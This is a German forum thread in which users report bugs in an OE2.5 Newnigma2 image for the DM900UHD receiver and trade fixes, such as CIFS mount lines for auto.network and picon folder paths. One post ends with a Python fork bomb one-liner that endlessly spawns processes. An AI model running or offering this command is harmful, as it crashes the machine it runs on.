Angepinnt OE2.5: Rückmeldungen zum weekly Image für DM900UHD

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Bei mir läuft irgend was nicht rund.

      Die Box war eben wieder eingeschaltet als ich um 5:35 Uhr auf bin. Uhrzeit im Display stand fest auf 01:20 Uhr. Sender stand auf RTL.
      Auch im Skin wurde die Uhrzeit falsch angezeigt.
      Nach einem Reboot stand die Uhrzeit dann auf 23:28.
    • AlfredENeumann schrieb:

      die auto.network manuell bearbeiten; so funzt es bei mir
      NAS -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxx,pass=yyy://192.168.178.xxx/abcd
      also bei mir funktioniert das leider nicht. wenn ich über Bl Taste autonetwork bearbeiten gehe und die Einträge abändern möchte ,bekomme ich ein GS. lösche ich das ganze und gehe neu hinzufügen kann ich die Einträge bearbeiten........ aber alles was ich bisher verucht habe ist gescheitert.
    • @wet

      Versuche mal das hier bzw. ändere es nach deinen Bedürfnissen um, wichtig sind auch die Freizeichen !

      Quellcode

      1. Media -fstype=cifs,rw,iocharset=utf8,user=xxxxxx,password=xxxxxx ://192.168.2.30/media
      Gehe per FTP auf deine Box /etc/ und gebe dies direkt in die auto.network ein, dann klappt es.
      Nichts Schein, wie es ist.
    • Leute das OE 2.5 ist noch spielwiese und es kann und wird immer zu crashes kommen aber wir können nur was fixen was wir nachvollziehen können.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • hallo zusammen,

      Ich werfe mal eine andere Frage hier zwischen. Wenn ich meine Box in den Idle Modus schalte, bleibt das LCD Display schwarz. Es wird keine Uhr angezeigte bzw wo Stelle ich das so in das im Idle Modus die Uhr im LCD Display erscheint?

      Danke
    • Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Ich weiß nicht, ob ich das hier oder im Picons Thread schreiben soll.
      Es geht um die LCD-Picons auf der 900er.
      Als ich am Sonntag das erste Image geflashed hatte wurden die Picons nur angezeigt, wenn man sie in den Ordner piconslcdSE legte. Nach einen Update wurde das gefixed und der Ordner Piconlcd konnte für die LCD Picons benutzt werden.
      Nun mußte ich jedoch erneut neu flashen (Image von gestern) und dann mußten die Picons wieder in den SE Ordner. Im normalen LCD-Ordner blieb das Display schwarz.
      Auch ein gerade durchgeführtes Update auf Newnigma2-daily 2016-12-13 brachte keine Änderung.
      Also mir ist es egal in welchem Ordner die Picons liegen; ich wollte es nur mal anmerken.
      Ansonsten großes Lob! Alles andere schnurrt spitze!
    • eigentlich sollte das mit dem update heute morgen fixed sein,
      die LCDPicons gehören in den ordner piconlcd
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • OE2.5: Rückmeldungen zum daily Image für DM900UHD

      mibohn schrieb:

      Joey schrieb:

      Mach ein Ticket auf.


      Danke! Hab also bei Dream ein Ticket aufgemacht (mein erstes!) und ihnen das Problem geschildert. Bin gespannt was sie antworten.
      LG


      Die heutige Rückmeldung von Dream war eher enttäuschend. Ich soll die Box zur Reparatur einschicken. Da tausche ich sie doch lieber beim Händler um - ich hab sie erst vor drei Tagen bekommen.
    • Oscam Neustart notwendig nach Idle - Erledigt nach Update 14.12.

      Hi, wie schon geschrieben, läuft das neue Image schon sehr stabil... Hab allerdings ein Problem(chen): Wenn ich aus dem Idle-Modus komme, muss ich Oscam immer neustarten, sonst funktionierts nicht (Oscam aktuelle Version vom Feed).
      Beim Neustart aus Standby funktioniert es, nachdem ich den Oscam Start in den Einstellungen um 10 Sekunden verzögert habe.
      Bin ich der Einzige mit diesem Problem, oder hab ich was überlesen?
      Danke!
      Alfred
      Yamp - gepimte Version auch für FHD - aktuelle Version V3.3.2 hier, bitte beachten: FAQ hier

      Wissen ist eins der wenigen Güter, das sich durch Teilen vermehren lässt .... :thumbsup:

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von AlfredENeumann ()

    • Bildbetrachter / MediaCenter

      wenn ich im Netzwerk (NAS) mir Fotos anschauen möchte , bekomme ich bei ok auf einen Fotofile einen GS. im MediaPortal + beim plugin bildbetrachter.
      kann sich das bitte mal einer anschen , wo es crasht !?

      Videos schauen + Musik hören funktioniert :)
      Dateien
    • Also Image an sich läuft bei mir recht stabil.
      Aber ich habe 2 Probleme:
      1. Wenn ich neustarten will hängt sich die Box immer auf
      2. Mit Newnigma2-Skin ist im Bouquet alles zu weit nach oben und nach rechts geschoben. Sprich ich kann zum Beispiel die Uhrzeit nicht vollständig erkennen